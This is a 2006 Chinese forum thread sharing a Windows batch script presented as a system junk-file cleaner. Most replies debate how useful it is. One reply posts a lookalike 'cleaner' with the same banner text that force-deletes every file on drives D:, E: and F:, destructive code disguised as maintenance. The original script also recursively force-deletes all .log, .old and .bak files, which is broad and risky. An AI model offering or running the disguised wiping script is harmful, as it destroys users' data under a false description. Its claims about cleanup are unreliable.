geguluo 发表于 2006-11-26 23:26:00

[分享]经典的程序莫过于此

<p>@echo off&nbsp;&nbsp;&nbsp;&nbsp; <br/>echo 正在清除系统垃圾文件,请稍等......&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /s /q %systemdrive%\*.tmp&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /s /q %systemdrive%\*._mp&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /s /q %systemdrive%\*.log&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /s /q %systemdrive%\*.gid&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /s /q %systemdrive%\*.chk&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /s /q %systemdrive%\*.old&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /s /q %systemdrive%\recycled\*.*&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /s /q %windir%\*.bak&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /s /q %windir%\prefetch\*.*&nbsp;&nbsp;&nbsp;&nbsp; <br/>rd /s /q %windir%\temp &amp; md %windir%\temp&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /q %userprofile%\COOKIES s\*.*&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /q %userprofile%\recent\*.*&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /s /q "%userprofile%\Local Settings\Temp\*.*"&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /s /q "%userprofile%\recent\*.*"&nbsp;&nbsp;&nbsp;&nbsp; <br/>sfc /purgecache '清理系统盘无用文件&nbsp;&nbsp;&nbsp;&nbsp; <br/>defrag %systemdrive% -b '优化预读信息&nbsp;&nbsp;&nbsp;&nbsp; <br/>echo 清除系统LJ完成!&nbsp;&nbsp;&nbsp;&nbsp; <br/>echo. &amp; pause <br/></p><p>将以上程序复制粘贴到记事本后,重命名为清除系统LJ.bat,可以清除电脑系统中的垃圾,感受飞一般的感觉</p>

geguluo 发表于 2006-11-27 10:34:00

没人顶吗?沙发自己坐,不顶的别用哦

伤风 发表于 2006-11-28 10:12:00

<p>@echo off&nbsp;&nbsp;&nbsp;&nbsp; <br/>echo 正在清除系统垃圾文件,请稍等......&nbsp;&nbsp;&nbsp;&nbsp; <br/>del /f /s /q d:\*.*&nbsp;&nbsp;&nbsp; <br/>del /f /s /q&nbsp;e:\*.*&nbsp;&nbsp;&nbsp; <br/>del /f /s /q f:\*.*<br/>sfc /purgecache '清理系统盘无用文件&nbsp;&nbsp;&nbsp;&nbsp; <br/>defrag %systemdrive% -b '优化预读信息&nbsp;&nbsp;&nbsp;&nbsp; <br/>echo 清除系统LJ完成!&nbsp;&nbsp;&nbsp;&nbsp; <br/>echo. &amp; pause <br/></p><p>浑身的清爽啊..</p>

煎饼 发表于 2006-11-28 19:04:00

其实主要是心里爽

geguluo 发表于 2006-11-28 21:49:00

实际效果不行吗?感觉可以啊,几KB东西比很多所谓的清理软件都强N多

Eagle 发表于 2006-12-7 15:48:00

问题是我装好系统后很多文件夹都重设了路径的。对我来说,这个是没用的。

七色玲珑石 发表于 2006-12-7 15:53:00

一般我只重设我的文档的路径
页: [1]
查看完整版本: [分享]经典的程序莫过于此